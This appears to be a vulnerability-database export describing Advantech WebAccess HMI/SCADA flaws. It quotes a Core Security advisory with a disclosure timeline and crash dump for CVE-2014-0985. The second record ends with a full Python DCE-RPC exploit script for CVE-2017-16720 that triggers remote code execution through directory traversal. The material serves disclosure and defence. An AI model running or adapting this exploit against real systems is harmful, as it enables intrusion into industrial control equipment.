interested in validating Advantech's vulnerability fix in their beta version. 2014-06-18: Core Security accepts the testing of the vendor beta version, but shares their concerns about waiting several months for fixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they plan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to provide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new version it's still vulnerable, and comments that after some analysis the vulnerable function doesn't has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know that that the vulnerabilities still exist. And asks to setup a teleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all interactions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the vendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point Zero Day Initiative has released several advisories[2] affecting the vendor including some that appears to be related to the one we are coordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where in coordination with them, and that after a review of the link shared by Core Security are related to ICSA-14-198-02 and don't appear to be related to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244 appears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a status update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and they are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was received in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated that they are currently training a new product manager and they have not yet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory publication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication for Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a silent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005 tagged as user-release.
-
References
[1] http://webaccess.advantech.com/. [2] http://www.zerodayinitiative.com/advisories/published/. [3] http://support.microsoft.com/kb/2458544. [4] https://github.com/CoreSecurity/sentinel.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0439", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "7.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05422" }, { "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "db": "CNNVD", "id": "CNNVD-201409-732" }, { "db": "NVD", "id": "CVE-2014-0985" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004354" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja", "sources": [ { "db": "BID", "id": "69529" } ], "trust": 0.3 }, "cve": "CVE-2014-0985", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0985", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-05422", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d295b594-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-68478", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0985", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0985", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-05422", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-732", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68478", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05422" }, { "db": "VULHUB", "id": "VHN-68478" }, { "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "db": "CNNVD", "id": "CNNVD-201409-732" }, { "db": "NVD", "id": "CVE-2014-0985" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the NodeName parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software featuring all engineering projects, database setup, drawing and software management using standard browsers over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Vulnerabilities\n\n\n1. *Advisory Information*\n\n Title: Advantech WebAccess Vulnerabilities\n Advisory ID: CORE-2014-0005\n Advisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities\n Date published: 2014-09-02\n Date of last update: 2014-09-01\n Vendors contacted: Advantech\n Release mode: User release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based\n software package for human-machine interfaces HMI, and supervisory\n control and data acquisition SCADA. \n\n\n4. WebAccess 7.2\n . \n\n\n5. *Non-vulnerable packages*\n\n . AdvantechWebAccessUSANode_20140730_3.4.3\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\n Advantech has addressed the vulnerability in WebAccess by issuing an\nupdate located at\n http://webaccess.advantech.com/downloads_software.php\n\n Given that this is a client-side vulnerability, affected users\nshould avoid\n opening untrusted \u0027.html\u0027 files. \n Core Security also recommends those affected use third party\nsoftware such as\n Sentinel [4] or EMET [3]\n that could help to prevent the exploitation of affected systems to\nsome extent. \n\n\n7. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom\n Core Security Exploit Writers Team. \n \n Core Security Advisories Team would also like to thank ICS-CERT\nCoordination Center\n for their assistance during the vulnerability reporting process. \n \n\n8. \n\n/-----\n \nEAX 03A39942 ASCII \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...\"\nECX 0162B720\nEDX 01630000 xpsp2res.01630000\nEBX 0162B720\nESP 0162B454\nEBP 0162B460\nESI 0162B4D8\nEDI 03A31E98\nEIP 064EA6D4 webvact.064EA6D4\n\n-----/\n\n\n/-----\n \nSEH chain of thread 000016CC\nAddress SE handler\n0162DB40 42424242\n\n-----/\n\n\n9. *Report Timeline*\n . 2014-05-06: Core Security notifies Advantech of the vulnerability. \nPublication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2\nweeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in\norder to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks\nfor a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the\nvendor and that they will notify us once the vendor has validated the\nvulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a\nnew release, expected to be released in September, and ask if Core\nSecurity is interested in validating Advantech\u0027s vulnerability fix in\ntheir beta version. 2014-06-18: Core Security accepts the testing of the vendor beta\nversion, but shares their concerns about waiting several months for\nfixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they\nplan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to\nprovide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new\nversion it\u0027s still vulnerable, and comments that after some analysis the\nvulnerable function doesn\u0027t has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know\nthat that the vulnerabilities still exist. And asks to setup a\nteleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all\ninteractions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the\nvendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point\nZero Day Initiative has released several advisories[2] affecting the\nvendor including some that appears to be related to the one we are\ncoordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where\nin coordination with them, and that after a review of the link shared by\nCore Security are related to ICSA-14-198-02 and don\u0027t appear to be\nrelated to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244\nappears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a\nstatus update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and\nthey are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was\nreceived in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated\nthat they are currently training a new product manager and they have not\nyet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory\npublication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication\nfor Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a\nsilent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005\ntagged as user-release. \n\n\n10. *References*\n\n [1] http://webaccess.advantech.com/. \n [2] http://www.zerodayinitiative.com/advisories/published/. \n [3] http://support.microsoft.com/kb/2458544. \n [4] https://github.com/CoreSecurity/sentinel. \n\n\n11. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating\n the future needs and requirements for information security\ntechnologies. \n We conduct our research in several important areas of computer security\n including system vulnerabilities, cyber attack planning and simulation,\n source code auditing, and cryptography. Our results include problem\n formalization, identification of vulnerabilities, novel solutions and\n prototypes for new technologies. CoreLabs regularly publishes security\n advisories, technical papers, project information and shared software\n tools for public use at:\n http://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\n Core Security Technologies enables organizations to get ahead of threats\n with security test and measurement solutions that continuously identify\n and demonstrate real-world exposures to their most critical assets. Our\n customers can gain real visibility into their security standing, real\n validation of their security controls, and real metrics to more\n effectively secure their organizations. \n\n Core Security\u0027s software solutions build on over a decade of trusted\n research and leading-edge threat expertise from the company\u0027s Security\n Consulting Services, CoreLabs and Engineering groups. Core Security\n Technologies can be reached at +1 (617) 399-6980 or on the Web at:\n http://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\n The contents of this advisory are copyright\n (c) 2014 Core Security and (c) 2014 CoreLabs,\n and are licensed under a Creative Commons\n Attribution Non-Commercial Share-Alike 3.0 (United States) License:\n http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories\n team, which is available for download at\n \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-0985" }, { "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "db": "CNVD", "id": "CNVD-2014-05422" }, { "db": "BID", "id": "69529" }, { "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68478" }, { "db": "PACKETSTORM", "id": "128120" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-68478", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-68478" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0985", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-14-261-01", "trust": 3.4 }, { "db": "BID", "id": "69529", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201409-732", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2014-05422", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004354", "trust": 0.8 }, { "db": "CXSECURITY", "id": "WLB-2014090006", "trust": 0.6 }, { "db": "IVD", "id": "D295B594-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "128120", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68478", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05422" }, { "db": "VULHUB", "id": "VHN-68478" }, { "db": "BID", "id": "69529" }, { "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-732" }, { "db": "NVD", "id": "CVE-2014-0985" } ] }, "id": "VAR-201409-0439", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05422" }, { "db": "VULHUB", "id": "VHN-68478" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05422" } ] }, "last_update_date": "2024-11-23T22:38:56.348000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2014-05422)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/53290" }, { "title": "AdvantechWebAccessUSANode_20140730_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=51645" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05422" }, { "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "db": "CNNVD", "id": "CNNVD-201409-732" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68478" }, { "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "db": "NVD", "id": "CVE-2014-0985" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-261-01" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69529" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0985" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0985" }, { "trust": 0.6, "url": "http://cxsecurity.com/issue/wlb-2014090006" }, { "trust": 0.4, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0987" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0988" }, { "trust": 0.1, "url": "http://www.zerodayinitiative.com/advisories/published/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0992" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0989" }, { "trust": 0.1, "url": "https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0991" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0990" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/downloads_software.php" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0986" }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0985" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05422" }, { "db": "VULHUB", "id": "VHN-68478" }, { "db": "BID", "id": "69529" }, { "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-732" }, { "db": "NVD", "id": "CVE-2014-0985" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05422" }, { "db": "VULHUB", "id": "VHN-68478" }, { "db": "BID", "id": "69529" }, { "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-732" }, { "db": "NVD", "id": "CVE-2014-0985" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2014-05422" }, { "date": "2014-09-20T00:00:00", "db": "VULHUB", "id": "VHN-68478" }, { "date": "2014-09-01T00:00:00", "db": "BID", "id": "69529" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "date": "2014-09-02T22:28:11", "db": "PACKETSTORM", "id": "128120" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-732" }, { "date": "2014-09-20T10:55:03.933000", "db": "NVD", "id": "CVE-2014-0985" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-29T00:00:00", "db": "CNVD", "id": "CNVD-2014-05422" }, { "date": "2015-08-05T00:00:00", "db": "VULHUB", "id": "VHN-68478" }, { "date": "2014-09-22T18:05:00", "db": "BID", "id": "69529" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004354" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-732" }, { "date": "2024-11-21T02:03:09.730000", "db": "NVD", "id": "CVE-2014-0985" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-732" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004354" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "d295b594-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201409-732" } ], "trust": 0.8 } }
var-201801-0150
Vulnerability from variot
A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator. An attacker can leverage this vulnerability to delete files accessible to the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Multiple denial-of-service vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. #!/usr/bin/python2.7
Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability
Date: 03-11-2018
Exploit Author: Chris Lyne (@lynerc)
Vendor Homepage: www.advantech.com
Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe
Version: Advantech WebAccess 8.2-2017.08.18
Tested on: Windows Server 2008 R2 Enterprise 64-bit
CVE : CVE-2017-16720
See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/
import sys, struct from impacket import uuid from impacket.dcerpc.v5 import transport
def call(dce, opcode, stubdata): dce.call(opcode, stubdata) res = -1 try: res = dce.recv() except Exception, e: print "Exception encountered..." + str(e) sys.exit(1) return res
if len(sys.argv) != 2: print "Provide only host arg" sys.exit(1)
port = 4592 interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc" version = "1.0"
host = sys.argv[1]
string_binding = "ncacn_ip_tcp:%s" % host trans = transport.DCERPCTransportFactory(string_binding) trans.set_dport(port)
dce = trans.get_dce_rpc() dce.connect()
print "Binding..." iid = uuid.uuidtup_to_bin((interface, version)) dce.bind(iid)
print "...1" stubdata = struct.pack("<III", 0x00, 0xc351, 0x04) call(dce, 2, stubdata)
print "...2" stubdata = struct.pack("<I", 0x02) res = call(dce, 4, stubdata) if res == -1: print "Something went wrong" sys.exit(1) res = struct.unpack("III", res)
if (len(res) < 3): print "Received unexpected length value" sys.exit(1)
print "...3"
ioctl 0x2711
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204) command = "..\..\windows\system32\calc.exe" fmt = "<" + str(0x204) + "s" stubdata += struct.pack(fmt, command) call(dce, 1, stubdata)
print "\nDid it work?"
dce.disconnect()
